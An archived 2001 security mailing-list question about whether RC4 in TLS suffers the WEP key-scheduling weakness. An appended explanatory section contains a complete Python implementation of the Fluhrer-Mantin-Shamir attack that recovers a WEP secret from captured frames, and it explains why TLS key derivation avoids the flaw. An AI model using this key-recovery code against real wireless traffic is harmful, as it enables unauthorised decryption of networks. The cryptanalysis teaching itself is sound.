From: Jeff.Hodges@kingsmountain.com
Sent: Tuesday, August 07, 2001 4:43 PM
To: Security Area Advisory Group
Cc: Jeff.Hodges@kingsmountain.com
Subject: [saag] RC4 insecurity wrt SSL/TLS?

A question for those who've read and grokked the first paper below...

given...

  Weaknesses in the Key Scheduling Algorithm of RC4
  http://www.eyetap.org/~rguerra/toronto2001/rc4_ksaproc.pdf

  Using the Fluhrer, Mantin, and Shamir Attack to Break WEP
  http://www.cs.rice.edu/~astubble/wep/

...and this from http://www.ietf.org/rfc/rfc2246.txt ...

  C. CipherSuite definitions
  . .
  CipherSuite                     Key Exchange   Cipher    Hash
  TLS_RSA_WITH_RC4_128_MD5        RSA            RC4_128   MD5
  TLS_RSA_WITH_RC4_128_SHA        RSA            RC4_128   SHA
  . . .
                           Key       Expanded      Effective   IV     Block
  Cipher      Type       Material  Key Material   Key Bits   Size    Size
  . .
  RC4_128     Stream        16          16           128        0      N/A
  . .

Is it thus possible for conformant TLS implementations to use similar-to-WEP RC4
initializations such that their operational use of RC4 as the TLS stream cipher is
similarly vulnerable?

An additional question is whether typical RC4 implementations-and-APIs give the
programmer enough latitude to step into the vulnerable-like-WEP mudpuddle?

thanks,

JeffH
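Added example (not from JeffH's message or from the two cited papers) of the "similar-to-WEP RC4 initialization" the question turns on. WEP builds each frame's RC4 key as IV || secret with the 3-byte IV sent in the clear, so an eavesdropper knows the first three bytes of every key and sees thousands of keys sharing one secret suffix; the Fluhrer-Mantin-Shamir key-scheduling weakness turns that into a byte-by-byte vote on the secret. The Python below implements RC4, the WEP key layout, the FMS "resolved IV" test and vote, a recovery loop with verification, and a demo-only oracle showing when a vote is provably exact. The 40-bit secret, the IV sequence (a sender that happens to walk through the weak class (B+3, 255, X) for every position B) and the captured frames are constructed for the demonstration; the 0xAA first plaintext byte is the real LLC/SNAP value that the Rice WEP paper uses to obtain the first keystream byte.

```python
"""Added example (not part of the saag thread or the cited papers): the FMS attack
against WEP's RC4 key layout IV || secret.  Secret, IVs and frames are constructed."""
from collections import Counter

def ksa_steps(key, steps=256):
    """First `steps` iterations of the RC4 key schedule; returns (S, j)."""
    S = list(range(256))
    j = 0
    for i in range(steps):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S, j

def rc4_keystream(key, n):
    """Full KSA, then n PRGA output bytes."""
    S, _ = ksa_steps(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def rc4_encrypt(key, data):
    return bytes(a ^ b for a, b in zip(data, rc4_keystream(key, len(data))))

def wep_packet_key(iv, secret):
    """WEP's per-frame RC4 key: the three public IV bytes, then the shared secret."""
    return bytes(iv) + bytes(secret)

def fms_guess(iv, known_secret, first_out):
    """One FMS vote for secret byte B = len(known_secret), or None if the IV is not
    'resolved'.  Uses only what an eavesdropper has: IV, recovered bytes, keystream[0]."""
    B = len(known_secret)
    S, j = ksa_steps(wep_packet_key(iv, known_secret), B + 3)  # steps 0..B+2
    p = S[1]
    if not (p < B + 3 and p + S[p] == B + 3):
        return None
    # Step B+3 moves S[j'] into S[B+3], j' = j + S[B+3] + K[B].  If the remaining
    # steps never touch positions 1, p, B+3 (probability about e^-3), the first
    # PRGA output is that S[B+3], so K[B] = S^-1[out] - j - S[B+3].
    return (S.index(first_out) - j - S[B + 3]) & 0xFF

def vote_is_forced(iv, secret, B):
    """Demo-only oracle (needs the real secret): True when the finished schedule left
    S[1], S[p], S[B+3] as the FMS argument assumes, so the vote must be exact."""
    key = wep_packet_key(iv, secret)
    S0, j0 = ksa_steps(key, B + 3)
    p = S0[1]
    j1 = (j0 + S0[B + 3] + key[B + 3]) & 0xFF
    S, _ = ksa_steps(key)
    return S[1] == p and S[p] == S0[p] and S[B + 3] == S0[j1]

def recover_secret(packets, secret_len, width=8):
    """Eavesdropper side.  packets: (iv, first keystream byte) pairs.  Vote one position
    at a time, confirm a full candidate against frames, back off to the next-best vote."""
    def verify(cand):
        return all(rc4_keystream(wep_packet_key(iv, cand), 1)[0] == out
                   for iv, out in packets[:16])
    def extend(known):
        if len(known) == secret_len:
            return known if verify(known) else None
        votes = Counter()
        for iv, out in packets:
            g = fms_guess(iv, known, out)
            if g is not None:
                votes[g] += 1
        for byte, _ in votes.most_common(width):
            found = extend(known + bytes([byte]))
            if found is not None:
                return found
        return None

    return extend(b"")

# Constructed scenario: 40-bit secret; the sender's IVs run through the weak class
# (B+3, 255, X) for every position B (cards with sequential IVs emitted exactly these).
SECRET = bytes.fromhex("1f8ec0ffee")
SNAP = 0xAA  # first plaintext byte of every WEP data frame (LLC/SNAP header)

def capture(secret):
    """Per frame the eavesdropper keeps the IV and ciphertext[0] ^ 0xAA."""
    packets = []
    for B in range(len(secret)):
        for x in range(256):
            iv = (B + 3, 255, x)
            ct = rc4_encrypt(wep_packet_key(iv, secret), bytes([SNAP]))
            packets.append((iv, ct[0] ^ SNAP))
    return packets

if __name__ == "__main__":
    packets = capture(SECRET)
    for B in range(len(SECRET)):
        resolved = [iv for iv, out in packets if fms_guess(iv, SECRET[:B], out) is not None]
        forced = sum(vote_is_forced(iv, SECRET, B) for iv in resolved)
        print(f"byte {B}: {len(resolved)} resolved IVs, {forced} forced (exact) votes")
    got = recover_secret(packets, len(SECRET))
    print(f"secret {SECRET.hex()}  recovered "
          f"{got.hex() if got else 'none verified; this single weak class was not enough'}")
```

The script prints, per secret position, how many of the 256 weak IVs pass the resolved test and how many of those votes were forced to be exact, then the recovered secret; a forced vote is always right, every other resolved IV votes for an essentially random byte, which is the roughly 5% versus 1/256 bias the paper describes. With only one weak class per byte the vote occasionally misses, and the verification step then reports no candidate rather than a wrong key. The contrast with RFC 2246 is in how the RC4 key comes to exist: the client and server write keys are slices of key_block = PRF(master_secret, "key expansion", server_random + client_random), fresh pseudorandom bytes per connection with nothing public prefixed to them (the IV Size column quoted above is 0 for RC4_128), and the stream cipher state is set up once per connection and carried across records (section 6.2.3.1). A conformant implementation therefore never presents the FMS precondition of many related keys with an attacker-known prefix. Nothing in RC4 itself prevents an application from recreating the WEP layout on top of an API that takes a raw key, which is the latitude the second question asks about; the FMS paper's mitigation for such uses is to discard the initial keystream output.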